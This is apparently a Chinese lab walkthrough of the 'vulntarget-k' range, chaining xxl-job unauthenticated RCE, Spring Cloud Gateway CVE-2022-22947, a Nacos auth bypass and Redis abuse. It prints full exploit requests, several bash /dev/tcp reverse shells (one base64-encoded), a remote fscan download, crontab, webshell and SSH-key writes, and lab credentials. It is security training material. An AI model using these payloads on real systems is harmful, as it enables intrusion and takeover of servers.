vulntarget-k
机器密码: xxl-job-admin:xxl-job/root123;admin/Bolean@10000 nacos-springcloudgateway:spring-nacos/root123;nacos/bolean@1q2 redis:redis/redis@1z;redis密码:nbsg@123456 拓扑图
准备工作
修改一下xxl-job的网卡
sudo ifconfig ens33 192.168.150.11/24 up
或者修改网络配置文件
sudo vim /etc/netplan/00-installer-config.yaml
sudo netplan apply
信息收集
扫描存活主机和端口,发现开放了22、8080、8081、9999
访问8080、8081端口报错404
9999端口报错500,后面根据返回无意中搜到了如下文章,发现情况相符,于是可以确认是xxl-job服务,存在xxl-job RCE未授权远程命令执行
{"code":500,"msg":"invalid request, HttpMethod not support."}
漏洞利用
xxl-job
payload如下:
POST /run HTTP/1.1
Host: 192.168.150.11:9999
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 356
{
"jobId": 1, // 任务ID
"executorHandler": "demoJobHandler", // 任务标识
"executorParams": "demoJobHandler", // 任务参数
"executorBlockStrategy": "COVER_EARLY", // 任务阻塞策略,可选值参考com.xxl.job.core.enums.ExecutorBlockStrategyEnum
"executorTimeout": 0, // 任务超时时间,单位秒,大于零时生效
"logId": 1, // 本次调度日志ID
"logDateTime": 1586629003729, // 本次调度日志时间
"glueType": "GLUE_POWERSHELL", // 任务模式,可选值参考com.xxl.job.core.glue.GlueTypeEnum
"glueSource": "calc", // GLUE脚本代码
"glueUpdatetime": 1586699003758, // GLUE脚本更新时间,用于判定脚本是否变更以及是否需要刷新
"broadcastIndex": 0, // 分片参数:当前分片
"broadcastTotal": 0 // 分片参数:总分片
}
接着访问一下IP:8080/xxl-job-admin/toLogin任务调度中心登录如下:
尝试弱口令admin/123456登录失败,溜溜梅🤣
再尝试命令执行来反弹shell,但是nc监听并没有返回,这里需要注意其中的任务模式glueType
BEAN("BEAN", false, null, null),
GLUE_GROOVY("GLUE(Java)", false, null, null),
GLUE_SHELL("GLUE(Shell)", true, "bash", ".sh"),
GLUE_PYTHON("GLUE(Python)", true, "python", ".py"),
GLUE_PHP("GLUE(PHP)", true, "php", ".php"),
GLUE_NODEJS("GLUE(Nodejs)", true, "node", ".js"),
GLUE_POWERSHELL("GLUE(PowerShell)", true, "powershell", ".ps1");
然后修改glueType为GLUE_SHELL再来尝试一下成功反弹shell
POST /run HTTP/1.1
Host: 192.168.150.11:9999
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 397
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "/bin/bash -i >& /dev/tcp/192.168.150.128/1234 0>&1",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
在/root目录下得到flag:flag{xxl_job_admin_2.2.0_RCE}
还发现存在网卡192.168.100.20
于是上传fscan扫一下内网,发现存在主机192.168.100.50
wget http://192.168.150.128/fscan
chmod +x fscan
./fscan -h 192.168.100.20/24 
再来单独扫一下这台主机发现开放了22、8800、8848端口,存在nacos和SpringCloud服务并且有漏洞如下:
root@vulntarget-k:/home/xxl-job/xxl-jar# ./fscan -h 192.168.100.50 -p 1-65535 -np
<b/xxl-jar# ./fscan -h 192.168.100.50 -p 1-65535 -np
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
192.168.100.50:22 open
192.168.100.50:8800 open
192.168.100.50:8848 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.100.50:8800 code:503 len:292 title:None
[*] WebTitle: http://192.168.100.50:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] http://192.168.100.50:8800 Spring-Cloud-CVE-2022-22947
[+] http://192.168.100.50:8800 poc-yaml-spring-actuator-heapdump-file
[+] http://192.168.100.50:8800 poc-yaml-springboot-env-unauth spring2springcloudgateway
首先我们来看看8800端口,存在Spring-Cloud-CVE-2022-22947,尝试直接利用poc发现无法执行命令
于是手工复现一下,先添加包含恶意的路由,201代表创建成功,payload如下:
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.100.50:8800
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 325
{
"id": "test",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
再刷新网关路由即可触发该payload
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.100.50:8800
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
访问/actuator/gateway/routes/test即可回显命令执行的结果
执行ifconfig发现还有个网卡192.168.88.68
执行pwd得知当前路径位于/home/spring-nacos/springcloudgateway
完事后需要删除所添加的路由,再刷新网关路由触发payload
DELETE /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.100.50:8800
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0于是尝试反弹shell,对 getruntime 执行命令进行编码或者使用数组的形式命令执行,但是都无法反弹shell,有可能是那种不出网的,nc收不到东西都
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.100.50:8800
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 325
{
"id": "test",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1MC4xMjgvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}再来尝试下打内存🐎,好家伙,不会Java尝试了很久然后直接给我干蓝屏了😇咕咕咕~这里放弃了,等作者出了wp再看看
接着来看8848端口,nacos有个未授权访问漏洞,漏洞地址:/nacos/v1/auth/users?pageNo=1&pageSize=9,发现绕过鉴权返回用户列表数据,但是密码通过bcrypt加密了
username "nacos"
password "$2a$10$/WcAwSqpXiDCq/zpuNVQGOPBIZ7jpUv60MyyXNQEqkK4b8k3rDQU6"
于是我们尝试如下命令来添加新用户或者改密码
# linux 是用单引号,window用双引号,否则会提示curl: no URL specified
# 新增用户
curl -XPOST -d 'username=test&password=test' 'http://192.168.100.50:8848/nacos/v1/auth/users'
# 修改用户密码
curl -XPUT -d 'username=nacos&newPassword=nacos' 'http://192.168.100.50:8848/nacos/v1/auth/users'
# 删除用户
curl -XDELETE -d 'username=test' 'http://192.168.100.50:8848/nacos/v1/auth/users'
访问首页/nacos,成功登录
很多内网应用都会把application.yml配置在这个配置中心,基本可以通过snakeyaml的payload横向打所有内网应用,结合https://github.com/artsploit/yaml-payload, 修改server配置,可导致RCE
redis
根据前面nacos可以发现redis-task,配置信息如下:
server:
port: 8586
api:
task:
url: http://127.0.0.1/api/office/taskHandle
knife4j:
redis:
host: 0.0.0.0
password: nbsg@123456
port: 6379
databases: 0,1,2,3,4,5,6,7
timeout: 60000
logging:
config: classpath:logback.xml
xxl:
job:
admin:
addresses: http://127.0.0.1:8998/xxl-job-admin
accessToken: X336qlhSuYz2Nshk
executor:
appname: redis-task
address:
ip:
port: 5599
logpath: /data/logs/xxl-job/redis-task
logretentiondays: 5
app:
mq:
delay:
queue: bb_DELAY_QUEUE
exchange: bb_delay_exchange
spring:
rabbitmq:
host: 127.0.0.1
port: 5672
username: admin
password: global2018#
virtualHost: /可知redis的密码是nbsg@123456,并使用redis-cli成功连接redis服务器,其版本为4.0.10
redis-cli -h 192.168.88.70 -a "nbsg@123456"
利用姿势1:在crontab里写定时任务反弹shell(失败)
相关配置文件: /var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名 /etc/crontab 这个文件负责调度各种管理和维护任务。 /etc/cron.d/ 这个目录用来存放任何要执行的crontab文件或脚本。 我们还可以把脚本放在/etc/cron.hourly、/etc/cron.daily、/etc/cron.weekly、/etc/cron.monthly目录中,让它每小时/天/星期、月执行一次。
# 添加名为xxx的key,值为后面反弹shell的语句,5个星号代表每分钟执行一次,其中的\n同样是为了换行,避免crontab的语法错误
set xxx "\n\n* * * * * bash -i>& /dev/tcp/192.168.150.128/1234 0>&1\n\n"
# 在kali和ubantu中,其文件位置为/var/spool/cron/crontabs/root,在centos系列中位置为/var/spool/cron/root,通常情况下没有root文件,需要自己创建
config set dir /var/spool/cron
config set dbfilename root
save
但是等了半天还是没弹,于是查看一下计划任务发现也没有反弹shell命令写入了靶机
cd /var/spool/cron
crontab -l
检查定时任务是否执行
tail -10000f /var/log/cron | grep 'bash'利用姿势2:利用redis数据库的备份功能,直接向Web目录中写webshell,但是发现不是默认路径无法利用
config set dir /var/www/html/
config set dbfilename 1.php
set webshell "<?php phpinfo();?>"
save
利用姿势3:redis写入ssh公钥,获取操作系统权限
kali生成ssh公钥和私钥,密码设置为空
ssh-keygen -t rsa
进入.ssh目录,然后将生成的公钥写入ceshi.txt文件
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") >ceshi.txt
将保存ssh的公钥ceshi.txt写入redis
cat ceshi.txt | redis-cli -h 192.168.88.70 -a "nbsg@123456" -x set crack
连接redis,使用 CONFIG GET dir 命令得到redis备份的路径,更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)并设置上传公钥的备份文件名字为authorized_keys:
config get dir
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save
成功写入ssh公钥到靶机,然后使用ssh免密登录靶机,得到flag:flag{good_redis}
ssh -i id_rsa root@192.168.88.70